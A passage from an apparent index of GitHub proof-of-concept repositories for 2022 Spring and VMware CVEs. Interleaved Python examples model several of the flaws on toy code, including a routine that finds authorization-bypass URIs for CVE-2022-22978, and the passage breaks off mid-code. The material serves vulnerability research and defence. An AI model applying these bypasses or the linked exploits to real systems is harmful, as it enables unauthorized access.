- [Vulnmachines/spring-cve-2022-22947](https://github.com/Vulnmachines/spring-cve-2022-22947)
- [Axx8/CVE-2022-22947_Rce_Exp](https://github.com/Axx8/CVE-2022-22947_Rce_Exp)
- [crowsec-edtech/CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)
- [Tas9er/SpringCloudGatewayRCE](https://github.com/Tas9er/SpringCloudGatewayRCE)
- [Greetdawn/CVE-2022-22947](https://github.com/Greetdawn/CVE-2022-22947)
- [Summer177/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/Summer177/Spring-Cloud-Gateway-CVE-2022-22947)
- [BerMalBerIst/CVE-2022-22947](https://github.com/BerMalBerIst/CVE-2022-22947)
- [tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway](https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway)
- [dingxiao77/-cve-2022-22947-](https://github.com/dingxiao77/-cve-2022-22947-)
- [flying0er/CVE-2022-22947-goby](https://github.com/flying0er/CVE-2022-22947-goby)
- [dbgee/CVE-2022-22947](https://github.com/dbgee/CVE-2022-22947)
- [nu0l/cve-2022-22947](https://github.com/nu0l/cve-2022-22947)
- [nanaao/CVE-2022-22947-POC](https://github.com/nanaao/CVE-2022-22947-POC)
- [hunzi0/CVE-2022-22947-Rce_POC](https://github.com/hunzi0/CVE-2022-22947-Rce_POC)
- [22ke/CVE-2022-22947](https://github.com/22ke/CVE-2022-22947)
- [M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE](https://github.com/M0ge/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE)
- [YutuSec/SpEL](https://github.com/YutuSec/SpEL)
- [Jun-5heng/CVE-2022-22947](https://github.com/Jun-5heng/CVE-2022-22947)
- [darkb1rd/cve-2022-22947](https://github.com/darkb1rd/cve-2022-22947)
- [mrknow001/CVE-2022-22947](https://github.com/mrknow001/CVE-2022-22947)
- [0x7eTeam/CVE-2022-22947](https://github.com/0x7eTeam/CVE-2022-22947)
- [ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code](https://github.com/ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code)
- [Arrnitage/CVE-2022-22947_exp](https://github.com/Arrnitage/CVE-2022-22947_exp)
- [PaoPaoLong-lab/Spring-CVE-2022-22947-](https://github.com/PaoPaoLong-lab/Spring-CVE-2022-22947-)
- [hh-hunter/cve-2022-22947-docker](https://github.com/hh-hunter/cve-2022-22947-docker)
- [k3rwin/spring-cloud-gateway-rce](https://github.com/k3rwin/spring-cloud-gateway-rce)
- [bysinks/CVE-2022-22947](https://github.com/bysinks/CVE-2022-22947)
- [Wrin9/CVE-2022-22947](https://github.com/Wrin9/CVE-2022-22947)
- [viemsr/spring_cloud_gateway_memshell](https://github.com/viemsr/spring_cloud_gateway_memshell)
- [Enokiy/cve-2022-22947-spring-cloud-gateway](https://github.com/Enokiy/cve-2022-22947-spring-cloud-gateway)
- [Nathaniel1025/CVE-2022-22947](https://github.com/Nathaniel1025/CVE-2022-22947)
- [Vancomycin-g/CVE-2022-22947](https://github.com/Vancomycin-g/CVE-2022-22947)
- [scopion/CVE-2022-22947-exp](https://github.com/scopion/CVE-2022-22947-exp)
- [sagaryadav8742/springcloudRCE](https://github.com/sagaryadav8742/springcloudRCE)
- [fbion/CVE-2022-22947](https://github.com/fbion/CVE-2022-22947)
- [talentsec/Spring-Cloud-Gateway-CVE-2022-22947](https://github.com/talentsec/Spring-Cloud-Gateway-CVE-2022-22947)
- [aesm1p/CVE-2022-22947-POC-Reproduce](https://github.com/aesm1p/CVE-2022-22947-POC-Reproduce)
- [4nNns/CVE-2022-22947](https://github.com/4nNns/CVE-2022-22947)
- [expzhizhuo/Burp_VulPscan](https://github.com/expzhizhuo/Burp_VulPscan)
- [twseptian/cve-2022-22947](https://github.com/twseptian/cve-2022-22947)
- [whwlsfb/cve-2022-22947-godzilla-memshell](https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell)
- [0730Nophone/CVE-2022-22947-](https://github.com/0730Nophone/CVE-2022-22947-)
- [anansec/CVE-2022-22947_EXP](https://github.com/anansec/CVE-2022-22947_EXP)
- [Wrong-pixel/CVE-2022-22947-exp](https://github.com/Wrong-pixel/CVE-2022-22947-exp)
- [stayfoolish777/CVE-2022-22947-POC](https://github.com/stayfoolish777/CVE-2022-22947-POC)
- [B0rn2d/Spring-Cloud-Gateway-Nacos](https://github.com/B0rn2d/Spring-Cloud-Gateway-Nacos)
- [kmahyyg/CVE-2022-22947](https://github.com/kmahyyg/CVE-2022-22947)
- [LY613313/CVE-2022-22947](https://github.com/LY613313/CVE-2022-22947)
- [SiJiDo/CVE-2022-22947](https://github.com/SiJiDo/CVE-2022-22947)
- [qq87234770/CVE-2022-22947](https://github.com/qq87234770/CVE-2022-22947)
- [Zh0um1/CVE-2022-22947](https://github.com/Zh0um1/CVE-2022-22947)
- [Le1a/CVE-2022-22947](https://github.com/Le1a/CVE-2022-22947)
- [cc3305/CVE-2022-22947](https://github.com/cc3305/CVE-2022-22947)

### CVE-2022-22948 (2022-03-29)

The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.

- [PenteraIO/CVE-2022-22948](https://github.com/PenteraIO/CVE-2022-22948)

### CVE-2022-22954 (2022-04-11)

VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.

- [axingde/CVE-2022-22954-POC](https://github.com/axingde/CVE-2022-22954-POC)
- [sherlocksecurity/VMware-CVE-2022-22954](https://github.com/sherlocksecurity/VMware-CVE-2022-22954)
- [Vulnmachines/VMWare_CVE-2022-22954](https://github.com/Vulnmachines/VMWare_CVE-2022-22954)
- [aniqfakhrul/CVE-2022-22954](https://github.com/aniqfakhrul/CVE-2022-22954)
- [jax7sec/CVE-2022-22954](https://github.com/jax7sec/CVE-2022-22954)
- [bb33bb/CVE-2022-22954-VMware-RCE](https://github.com/bb33bb/CVE-2022-22954-VMware-RCE)
- [lucksec/VMware-CVE-2022-22954](https://github.com/lucksec/VMware-CVE-2022-22954)
- [mumu2020629/-CVE-2022-22954-scanner](https://github.com/mumu2020629/-CVE-2022-22954-scanner)
- [MSeymenD/CVE-2022-22954-Testi](https://github.com/MSeymenD/CVE-2022-22954-Testi)
- [corelight/cve-2022-22954](https://github.com/corelight/cve-2022-22954)
- [DrorDvash/CVE-2022-22954_VMware_PoC](https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC)
- [Jun-5heng/CVE-2022-22954](https://github.com/Jun-5heng/CVE-2022-22954)
- [tunelko/CVE-2022-22954-PoC](https://github.com/tunelko/CVE-2022-22954-PoC)
- [bewhale/CVE-2022-22954](https://github.com/bewhale/CVE-2022-22954)
- [emilyastranova/VMware-CVE-2022-22954-Command-Injector](https://github.com/emilyastranova/VMware-CVE-2022-22954-Command-Injector)
- [MLX15/CVE-2022-22954](https://github.com/MLX15/CVE-2022-22954)
- [mhurts/CVE-2022-22954-POC](https://github.com/mhurts/CVE-2022-22954-POC)
- [nguyenv1nK/CVE-2022-22954](https://github.com/nguyenv1nK/CVE-2022-22954)
- [Chocapikk/CVE-2022-22954](https://github.com/Chocapikk/CVE-2022-22954)
- [secfb/CVE-2022-22954](https://github.com/secfb/CVE-2022-22954)
- [orwagodfather/CVE-2022-22954](https://github.com/orwagodfather/CVE-2022-22954)
- [b4dboy17/CVE-2022-22954](https://github.com/b4dboy17/CVE-2022-22954)
- [arzuozkan/CVE-2022-22954](https://github.com/arzuozkan/CVE-2022-22954)
- [amit-pathak009/CVE-2022-22954](https://github.com/amit-pathak009/CVE-2022-22954)
- [amit-pathak009/CVE-2022-22954-PoC](https://github.com/amit-pathak009/CVE-2022-22954-PoC)
- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller)
- [lolminerxmrig/CVE-2022-22954_](https://github.com/lolminerxmrig/CVE-2022-22954_)

### CVE-2022-22963 (2022-04-01)

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL expression as a routing-expression that may result in remote code execution and access to local resources.

- [hktalent/spring-spel-0day-poc](https://github.com/hktalent/spring-spel-0day-poc)
- [dinosn/CVE-2022-22963](https://github.com/dinosn/CVE-2022-22963)
- [RanDengShiFu/CVE-2022-22963](https://github.com/RanDengShiFu/CVE-2022-22963)
- [darryk10/CVE-2022-22963](https://github.com/darryk10/CVE-2022-22963)
- [Kirill89/CVE-2022-22963-PoC](https://github.com/Kirill89/CVE-2022-22963-PoC)
- [stevemats/Spring0DayCoreExploit](https://github.com/stevemats/Spring0DayCoreExploit)
- [puckiestyle/CVE-2022-22963](https://github.com/puckiestyle/CVE-2022-22963)
- [me2nuk/CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963)
- [kh4sh3i/Spring-CVE](https://github.com/kh4sh3i/Spring-CVE)
- [AayushmanThapaMagar/CVE-2022-22963](https://github.com/AayushmanThapaMagar/CVE-2022-22963)
- [twseptian/cve-2022-22963](https://github.com/twseptian/cve-2022-22963)
- [SealPaPaPa/SpringCloudFunction-Research](https://github.com/SealPaPaPa/SpringCloudFunction-Research)
- [G01d3nW01f/CVE-2022-22963](https://github.com/G01d3nW01f/CVE-2022-22963)
- [k3rwin/spring-cloud-function-rce](https://github.com/k3rwin/spring-cloud-function-rce)
- [75ACOL/CVE-2022-22963](https://github.com/75ACOL/CVE-2022-22963)
- [dr6817/CVE-2022-22963](https://github.com/dr6817/CVE-2022-22963)
- [iliass-dahman/CVE-2022-22963-POC](https://github.com/iliass-dahman/CVE-2022-22963-POC)
- [charis3306/CVE-2022-22963](https://github.com/charis3306/CVE-2022-22963)
- [lemmyz4n3771/CVE-2022-22963-PoC](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC)
- [J0ey17/CVE-2022-22963_Reverse-Shell-Exploit](https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit)
- [Mustafa1986/CVE-2022-22963](https://github.com/Mustafa1986/CVE-2022-22963)
- [SourM1lk/CVE-2022-22963-Exploit](https://github.com/SourM1lk/CVE-2022-22963-Exploit)
- [randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE](https://github.com/randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE)
- [gunzf0x/CVE-2022-22963](https://github.com/gunzf0x/CVE-2022-22963)
- [nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963](https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963)
- [BearClaw96/CVE-2022-22963-Poc-Bearcules](https://github.com/BearClaw96/CVE-2022-22963-Poc-Bearcules)
- [jrbH4CK/CVE-2022-22963](https://github.com/jrbH4CK/CVE-2022-22963)

### CVE-2022-22965 (2022-04-01)

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

- [BobTheShoplifter/Spring4Shell-POC](https://github.com/BobTheShoplifter/Spring4Shell-POC)
- [Mr-xn/spring-core-rce](https://github.com/Mr-xn/spring-core-rce)
- [TheGejr/SpringShell](https://github.com/TheGejr/SpringShell)
- [reznok/Spring4Shell-POC](https://github.com/reznok/Spring4Shell-POC)
- [light-Life/CVE-2022-22965-GUItools](https://github.com/light-Life/CVE-2022-22965-GUItools)
- [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc)
- [k3rwin/spring-core-rce](https://github.com/k3rwin/spring-core-rce)
- [liangyueliangyue/spring-core-rce](https://github.com/liangyueliangyue/spring-core-rce)
- [Kirill89/CVE-2022-22965-PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)
- [FourCoreLabs/spring4shell-exploit-poc](https://github.com/FourCoreLabs/spring4shell-exploit-poc)
- [alt3kx/CVE-2022-22965_PoC](https://github.com/alt3kx/CVE-2022-22965_PoC)
- [GuayoyoCyber/CVE-2022-22965](https://github.com/GuayoyoCyber/CVE-2022-22965)
- [colincowie/Safer_PoC_CVE-2022-22965](https://github.com/colincowie/Safer_PoC_CVE-2022-22965)
- [rwincey/spring4shell-CVE-2022-22965](https://github.com/rwincey/spring4shell-CVE-2022-22965)
- [viniciuspereiras/CVE-2022-22965-poc](https://github.com/viniciuspereiras/CVE-2022-22965-poc)
- [mebibite/springhound](https://github.com/mebibite/springhound)
- [likewhite/CVE-2022-22965](https://github.com/likewhite/CVE-2022-22965)
- [Axx8/SpringFramework_CVE-2022-22965_RCE](https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE)
- [snicoll-scratches/spring-boot-cve-2022-22965](https://github.com/snicoll-scratches/spring-boot-cve-2022-22965)
- [nu0l/CVE-2022-22965](https://github.com/nu0l/CVE-2022-22965)
- [tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce](https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce)
- [helsecert/CVE-2022-22965](https://github.com/helsecert/CVE-2022-22965)
- [lcarea/CVE-2022-22965](https://github.com/lcarea/CVE-2022-22965)
- [Joe1sn/CVE-2022-22965](https://github.com/Joe1sn/CVE-2022-22965)
- [zer0yu/CVE-2022-22965](https://github.com/zer0yu/CVE-2022-22965)
- [me2nuk/CVE-2022-22965](https://github.com/me2nuk/CVE-2022-22965)
- [wshon/spring-framework-rce](https://github.com/wshon/spring-framework-rce)
- [Wrin9/CVE-2022-22965](https://github.com/Wrin9/CVE-2022-22965)
- [wjl110/CVE-2022-22965_Spring_Core_RCE](https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE)
- [mwojterski/cve-2022-22965](https://github.com/mwojterski/cve-2022-22965)
- [gpiechnik2/nmap-spring4shell](https://github.com/gpiechnik2/nmap-spring4shell)
- [itsecurityco/CVE-2022-22965](https://github.com/itsecurityco/CVE-2022-22965)
- [daniel0x00/Invoke-CVE-2022-22965-SafeCheck](https://github.com/daniel0x00/Invoke-CVE-2022-22965-SafeCheck)
- [fracturelabs/spring4shell_victim](https://github.com/fracturelabs/spring4shell_victim)
- [sunnyvale-it/CVE-2022-22965-PoC](https://github.com/sunnyvale-it/CVE-2022-22965-PoC)
- [twseptian/cve-2022-22965](https://github.com/twseptian/cve-2022-22965)
- [netcode/Spring4shell-CVE-2022-22965-POC](https://github.com/netcode/Spring4shell-CVE-2022-22965-POC)
- [fracturelabs/go-scan-spring](https://github.com/fracturelabs/go-scan-spring)
- [Snip3R69/spring-shell-vuln](https://github.com/Snip3R69/spring-shell-vuln)
- [luoqianlin/CVE-2022-22965](https://github.com/luoqianlin/CVE-2022-22965)
- [0xrobiul/CVE-2022-22965](https://github.com/0xrobiul/CVE-2022-22965)
- [LudovicPatho/CVE-2022-22965_Spring4Shell](https://github.com/LudovicPatho/CVE-2022-22965_Spring4Shell)
- [irgoncalves/irule-cve-2022-22965](https://github.com/irgoncalves/irule-cve-2022-22965)
- [datawiza-inc/spring-rec-demo](https://github.com/datawiza-inc/spring-rec-demo)
- [alt3kx/CVE-2022-22965](https://github.com/alt3kx/CVE-2022-22965)
- [wikiZ/springboot_CVE-2022-22965](https://github.com/wikiZ/springboot_CVE-2022-22965)
- [4nth0ny1130/spring4shell_behinder](https://github.com/4nth0ny1130/spring4shell_behinder)
- [t3amj3ff/Spring4ShellPoC](https://github.com/t3amj3ff/Spring4ShellPoC)
- [CalumHutton/CVE-2022-22965-PoC_Payara](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)
- [fransvanbuul/CVE-2022-22965-susceptibility](https://github.com/fransvanbuul/CVE-2022-22965-susceptibility)
- [te5t321/Spring4Shell-CVE-2022-22965.py](https://github.com/te5t321/Spring4Shell-CVE-2022-22965.py)
- [Loneyers/Spring4Shell](https://github.com/Loneyers/Spring4Shell)
- [p1ckzi/CVE-2022-22965](https://github.com/p1ckzi/CVE-2022-22965)
- [Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-](https://github.com/Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-)
- [c4mx/CVE-2022-22965_PoC](https://github.com/c4mx/CVE-2022-22965_PoC)
- [mariomamo/CVE-2022-22965](https://github.com/mariomamo/CVE-2022-22965)
- [khidottrivi/CVE-2022-22965](https://github.com/khidottrivi/CVE-2022-22965)
- [Enokiy/spring-RCE-CVE-2022-22965](https://github.com/Enokiy/spring-RCE-CVE-2022-22965)
- [cxzero/CVE-2022-22965-spring4shell](https://github.com/cxzero/CVE-2022-22965-spring4shell)
- [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan)
- [D1mang/Spring4Shell-CVE-2022-22965](https://github.com/D1mang/Spring4Shell-CVE-2022-22965)
- [iloveflag/Fast-CVE-2022-22965](https://github.com/iloveflag/Fast-CVE-2022-22965)
- [ClemExp/CVE-2022-22965-PoC](https://github.com/ClemExp/CVE-2022-22965-PoC)
- [clemoregan/SSE4-CVE-2022-22965](https://github.com/clemoregan/SSE4-CVE-2022-22965)
- [devengpk/CVE-2022-22965](https://github.com/devengpk/CVE-2022-22965)
- [zangcc/CVE-2022-22965-rexbb](https://github.com/zangcc/CVE-2022-22965-rexbb)
- [ajith737/Spring4Shell-CVE-2022-22965-POC](https://github.com/ajith737/Spring4Shell-CVE-2022-22965-POC)
- [c33dd/CVE-2022-22965](https://github.com/c33dd/CVE-2022-22965)
- [gokul-ramesh/Spring4Shell-PoC-exploit](https://github.com/gokul-ramesh/Spring4Shell-PoC-exploit)
- [bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-](https://github.com/bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-)
- [BKLockly/CVE-2022-22965](https://github.com/BKLockly/CVE-2022-22965)
- [dbgee/Spring4Shell](https://github.com/dbgee/Spring4Shell)
- [jakabakos/CVE-2022-22965-Spring4Shell](https://github.com/jakabakos/CVE-2022-22965-Spring4Shell)
- [sohamsharma966/Spring4Shell-CVE-2022-22965](https://github.com/sohamsharma966/Spring4Shell-CVE-2022-22965)
- [LucasPDiniz/CVE-2022-22965](https://github.com/LucasPDiniz/CVE-2022-22965)
- [xsxtw/SpringFramework_CVE-2022-22965_RCE](https://github.com/xsxtw/SpringFramework_CVE-2022-22965_RCE)

### CVE-2022-22966 (2022-04-14)

An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server.

- [bb33bb/CVE-2022-22966](https://github.com/bb33bb/CVE-2022-22966)

### CVE-2022-22968 (2022-04-14)

In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive, which means a field is not effectively protected unless it is listed with both an upper-case and a lower-case first character, and likewise for the first character of every nested field within the property path.

- [MarcinGadz/spring-rce-poc](https://github.com/MarcinGadz/spring-rce-poc)
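
The case-sensitivity problem described above, as an added example that is not Spring Framework's code: a toy data binder whose `disallowedFields` check runs against the raw parameter name while the property write goes to the canonical path. `simple_match` is a simplified stand-in for Spring's `PatternMatchUtils.simpleMatch` (only a leading and/or trailing `*` wildcard), `canonical_path` is an assumption modelled on the advisory text rather than on Spring's `BeanWrapper`, and the request parameter `Class.classLoader.x` is constructed.

```python
# Added example (not Spring Framework's code): why a case-sensitive disallowedFields
# pattern such as "class.*" still lets a parameter named "Class.classLoader.x"
# reach the same property (CVE-2022-22968).


def simple_match(pattern: str, value: str) -> bool:
    """Simplified stand-in for Spring's PatternMatchUtils.simpleMatch: supports a
    leading and/or trailing '*' wildcard, which is all the patterns below need."""
    if pattern.startswith("*") and pattern.endswith("*"):
        return pattern[1:-1] in value
    if pattern.startswith("*"):
        return value.endswith(pattern[1:])
    if pattern.endswith("*"):
        return value.startswith(pattern[:-1])
    return pattern == value


def canonical_path(name: str) -> str:
    """Property resolution that tolerates a capitalised first letter per path segment
    (assumption modelled on the advisory text, not on Spring's BeanWrapper)."""
    return ".".join(seg[:1].lower() + seg[1:] for seg in name.split("."))


def is_field_allowed(field: str, disallowed: list, case_insensitive: bool) -> bool:
    """Vulnerable check (case_insensitive=False) versus the fixed one, which compares
    the field and the patterns in lower case."""
    if case_insensitive:
        field = field.lower()
        disallowed = [p.lower() for p in disallowed]
    return not any(simple_match(p, field) for p in disallowed)


def bind(params: dict, disallowed: list, case_insensitive: bool = False) -> dict:
    """Copy request parameters onto a target unless the raw parameter name is
    disallowed. The check sees the raw name; the write goes to the canonical path."""
    target = {}
    for name, value in params.items():
        if is_field_allowed(name, disallowed, case_insensitive):
            target[canonical_path(name)] = value
    return target


if __name__ == "__main__":
    rules = ["class.*"]                       # the pattern a developer would naturally write
    attempt = {"Class.classLoader.x": "1"}    # constructed request parameter
    print("vulnerable:", bind(attempt, rules))                         # {'class.classLoader.x': '1'}
    print("fixed:     ", bind(attempt, rules, case_insensitive=True))  # {}
```

On an unpatched version the documented workaround is to list every capitalisation explicitly (`class.*`, `Class.*`, `*.class.*`, `*.Class.*`); with the case-insensitive comparison a single `class.*` is enough.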

### CVE-2022-22971 (2022-05-12)

In Spring Framework versions prior to 5.3.20 and 5.2.22, and older unsupported versions, an application with a STOMP over WebSocket endpoint is vulnerable to a denial of service attack by an authenticated user.

- [tchize/CVE-2022-22971](https://github.com/tchize/CVE-2022-22971)

### CVE-2022-22972 (2022-05-20)

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

- [horizon3ai/CVE-2022-22972](https://github.com/horizon3ai/CVE-2022-22972)
- [Dghpi9/CVE-2022-22972](https://github.com/Dghpi9/CVE-2022-22972)
- [bengisugun/CVE-2022-22972-](https://github.com/bengisugun/CVE-2022-22972-)

### CVE-2022-22976 (2022-05-19)

Spring Security versions 5.5.x prior to 5.5.7, 5.6.x prior to 5.6.4, and earlier unsupported versions contain an integer overflow vulnerability. When using the BCrypt class with the maximum work factor (31), the encoder does not perform any salt rounds, due to an integer overflow error. The default settings are not affected by this CVE.

- [spring-io/cve-2022-22976-bcrypt-skips-salt](https://github.com/spring-io/cve-2022-22976-bcrypt-skips-salt)
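
The integer overflow described above, as an added example that is not Spring Security's code: the vulnerable BCrypt implementation computed its loop bound as a 32-bit Java `int` (`rounds = 1 << log_rounds`), so a work factor of 31 produced a negative bound and the key-expansion loop ran zero times. The `rounds_executed_fixed` function models the fix as range validation plus a counter that cannot wrap; whether the project's patch does exactly that is an assumption.

```python
# Added example (not Spring Security's code): how Java's 32-bit `int rounds = 1 << log_rounds`
# turns a BCrypt work factor of 31 into zero key-expansion rounds (CVE-2022-22976).

INT_MAX = 2**31 - 1


def java_int_shift(log_rounds: int) -> int:
    """Emulate the Java expression `1 << log_rounds` on a 32-bit two's-complement int."""
    value = (1 << (log_rounds & 31)) & 0xFFFFFFFF   # Java masks the shift distance to 5 bits
    return value - 2**32 if value > INT_MAX else value


def rounds_executed_vulnerable(log_rounds: int) -> int:
    """Iterations of `for (i = 0; i < rounds; i++) { key(password); key(salt); }`
    when `rounds` is the 32-bit value: a negative bound means zero iterations."""
    return max(java_int_shift(log_rounds), 0)


def rounds_executed_fixed(log_rounds: int) -> int:
    """Assumed fix: reject an out-of-range work factor and compute the bound in a
    type that cannot wrap (a Python int here; a long would do in Java)."""
    if not 4 <= log_rounds <= 31:
        raise ValueError("work factor must be between 4 and 31")
    return 1 << log_rounds


def relative_cost(log_rounds: int, vulnerable: bool) -> float:
    """Fraction of the intended 2**log_rounds iterations that actually run."""
    executed = rounds_executed_vulnerable(log_rounds) if vulnerable else rounds_executed_fixed(log_rounds)
    return executed / (1 << log_rounds)


if __name__ == "__main__":
    for lr in (10, 30, 31):
        print(lr, rounds_executed_vulnerable(lr), rounds_executed_fixed(lr))
```

The practical check is simply that your configured strength is below 31; the default (10) and every value up to 30 are unaffected, which is why the advisory says default settings are not impacted.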

### CVE-2022-22978 (2022-05-19)

In Spring Security versions prior to 5.4.11, 5.5.7 and 5.6.4, and older unsupported versions, RegexRequestMatcher can easily be misconfigured so that it is bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.

- [DeEpinGh0st/CVE-2022-22978](https://github.com/DeEpinGh0st/CVE-2022-22978)
- [ducluongtran9121/CVE-2022-22978-PoC](https://github.com/ducluongtran9121/CVE-2022-22978-PoC)
- [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978)
- [umakant76705/CVE-2022-22978](https://github.com/umakant76705/CVE-2022-22978)
- [Raghvendra1207/CVE-2022-22978](https://github.com/Raghvendra1207/CVE-2022-22978)
- [wan9xx/CVE-2022-22978-demo](https://github.com/wan9xx/CVE-2022-22978-demo)
- [BoB13-Opensource-Contribution-Team9/CVE-2022-22978](https://github.com/BoB13-Opensource-Contribution-Team9/CVE-2022-22978)
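
Why a `.` in the pattern matters, as an added example that is not Spring Security's code: `RegexRequestMatcher` requires the whole request URI to match, and without the DOTALL flag `.` does not match a line terminator, so a URI carrying one matches no rule and falls through to whatever the chain's default is. The `/admin/.*` rule, the permit-all default and the `ROLE_ADMIN` check are constructed; whether a line terminator in the path reaches the matcher depends on the servlet container, as the advisory says.

```python
# Added example (not Spring Security's code): why a RegexRequestMatcher rule written
# with `.` can be side-stepped by a line terminator in the request URI (CVE-2022-22978).
import re
from typing import Optional

# Constructed rule: anything under /admin/ should require ROLE_ADMIN.
ADMIN_PATTERN = r"/admin/.*"


def regex_matcher(pattern: str, request_uri: str, dotall: bool = False) -> bool:
    """Stand-in for RegexRequestMatcher.matches(): the whole URI must match.
    Without DOTALL, Python's `.` does not match "\\n"; Java's default additionally
    excludes "\\r", "\\u0085", "\\u2028" and "\\u2029"."""
    flags = re.DOTALL if dotall else 0
    return re.compile(pattern, flags).fullmatch(request_uri) is not None


def is_authorized(request_uri: str, roles: set, dotall: bool = False) -> bool:
    """Constructed authorization chain: a matching rule demands ROLE_ADMIN; a URI
    that matches no rule falls through to an assumed permit-all default."""
    if regex_matcher(ADMIN_PATTERN, request_uri, dotall):
        return "ROLE_ADMIN" in roles
    return True


def find_bypass(request_uri: str, roles: set) -> Optional[str]:
    """Append each terminator Java's `.` excludes and return the first URI that the
    vulnerable matcher lets through but the DOTALL matcher still protects.
    (Under Python's re only "\\n" behaves this way.)"""
    for terminator in ("\n", "\r", "\u0085", "\u2028", "\u2029"):
        candidate = request_uri + terminator
        if is_authorized(candidate, roles) and not is_authorized(candidate, roles, dotall=True):
            return candidate
    return None


if __name__ == "__main__":
    print(repr(find_bypass("/admin/users", set())))   # '/admin/users\n'
    print(repr(find_bypass("/public/index", set())))  # None
```

The durable fix is to compile with `Pattern.DOTALL` (or `(?s)`), which is what the patched matcher does; a more robust rule set also avoids relying on a permissive fallback at all.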

### CVE-2022-22980 (2022-06-22)

A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized.

- [trganda/CVE-2022-22980](https://github.com/trganda/CVE-2022-22980)
- [kuron3k0/Spring-Data-Mongodb-Example](https://github.com/kuron3k0/Spring-Data-Mongodb-Example)
- [li8u99/Spring-Data-Mongodb-Demo](https://github.com/li8u99/Spring-Data-Mongodb-Demo)
- [jweny/cve-2022-22980](https://github.com/jweny/cve-2022-22980)
- [murataydemir/CVE-2022-22980](https://github.com/murataydemir/CVE-2022-22980)
- [Vulnmachines/Spring_cve-2022-22980](https://github.com/Vulnmachines/Spring_cve-2022-22980)

### CVE-2022-23046 (2022-01-19)

PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL statements in the "subnet" parameter while searching a subnet via app/admin/routing/edit-bgp-mapping-search.php

- [jcarabantes/CVE-2022-23046](https://github.com/jcarabantes/CVE-2022-23046)
- [dnr6419/CVE-2022-23046](https://github.com/dnr6419/CVE-2022-23046)
- [hadrian3689/phpipam_1.4.4](https://github.com/hadrian3689/phpipam_1.4.4)
- [bernauers/CVE-2022-23046](https://github.com/bernauers/CVE-2022-23046)

### CVE-2022-23093 (2024-02-15)

ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response, ping has to reconstruct the IP header, the ICMP header and, if present, a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.

The pr_pack() function copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.

The memory safety bugs described above can be triggered by a remote host, causing the ping program to crash.

The ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur.

- [Inplex-sys/CVE-2022-23093](https://github.com/Inplex-sys/CVE-2022-23093)
- [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit)
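
The header-length arithmetic behind the overflow, as an added example that is not FreeBSD's ping source: a parser that walks outer IP, ICMP, quoted IP and quoted ICMP headers, derives each IP header's real length from its IHL field, and reports how far a copy into a `sizeof(struct ip)` buffer would overrun when options are present. The packet is constructed inline (NOP options, zero checksums, addresses from 192.0.2.0/24), and the "40 bytes" figure falls straight out of the 60-byte maximum header minus the 20-byte fixed part.

```python
# Added example (not FreeBSD's ping source): the header-length arithmetic behind
# CVE-2022-23093 and the bounds check that pr_pack() lacked, on a constructed
# ICMP error response whose outer and quoted IP headers both carry options.
import struct

IP_FIXED_HDR = 20   # sizeof(struct ip): the option-less part pr_pack() copied into
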